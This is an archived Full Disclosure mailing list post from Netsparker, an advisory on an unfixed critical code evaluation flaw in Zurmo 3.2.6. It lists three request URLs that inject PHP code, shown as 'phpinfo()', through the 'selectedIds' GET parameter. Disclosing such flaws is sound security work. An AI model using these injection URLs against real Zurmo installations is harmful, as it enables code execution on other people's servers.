Full Disclosure mailing list archives

Code Evaluation Vulnerability in Zurmo 3.2.6


From: Daniel Bishtawi <daniel () netsparker com>
Date: Thu, 25 Jul 2019 11:34:28 +0200

Hello,

We are informing you about the vulnerabilities in Zurmo 3.2.6.

Here are the details:

Information
--------------------
Advisory by Netsparker
Name: Code Evaluation Vulnerability in Zurmo
Affected Software: Zurmo
Affected Versions: 3.2.6
Homepage: http://zurmo.org
Vulnerability: Code Evaluation
Severity: Critical
Status: Not Fixed
Netsparker Advisory Reference: NS-19-007

Technical Details
--------------------

URL: http://
{DOMAIN}/zurmo/app/index.php/leads/default/?_=1557483150787&ajax=list-view&Contact_page=&Contact_sort=&selectedIds=phpinfo()
Parameter Name : selectedIds
Parameter Type: GET
Attack Pattern: phpinfo()

URL: http://
{DOMAIN}/zurmo/app/index.php/opportunities/?_=1557483204319&ajax=list-view&Opportunity_page=&Opportunity_sort=&selectedIds=phpinfo()
Parameter Name : selectedIds
Parameter Type: GET
Attack Pattern: phpinfo()

URL: http://
{DOMAIN}/zurmo/app/index.php/opportunities/default/?_=1557483206340&ajax=list-view&Opportunity_page=&Opportunity_sort=&selectedIds=phpinfo()
Parameter Name : selectedIds
Parameter Type: GET
Attack Pattern: phpinfo()

For more information:
https://www.netsparker.com/web-applications-advisories/ns-19-007-code-evaluation-in-zurmo/

Regards,

Daniel Bishtawi
Marketing Administrator | Netsparker Web Application Security Scanner
Follow us on Twitter <https://twitter.com/netsparker> | LinkedIn
<https://www.linkedin.com/company/netsparker-ltd> | Facebook
<https://facebook.com/netsparker>
<https://www.netsparker.com/blog/events/exhibiting-black-hat-usa-2019/>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


Current thread: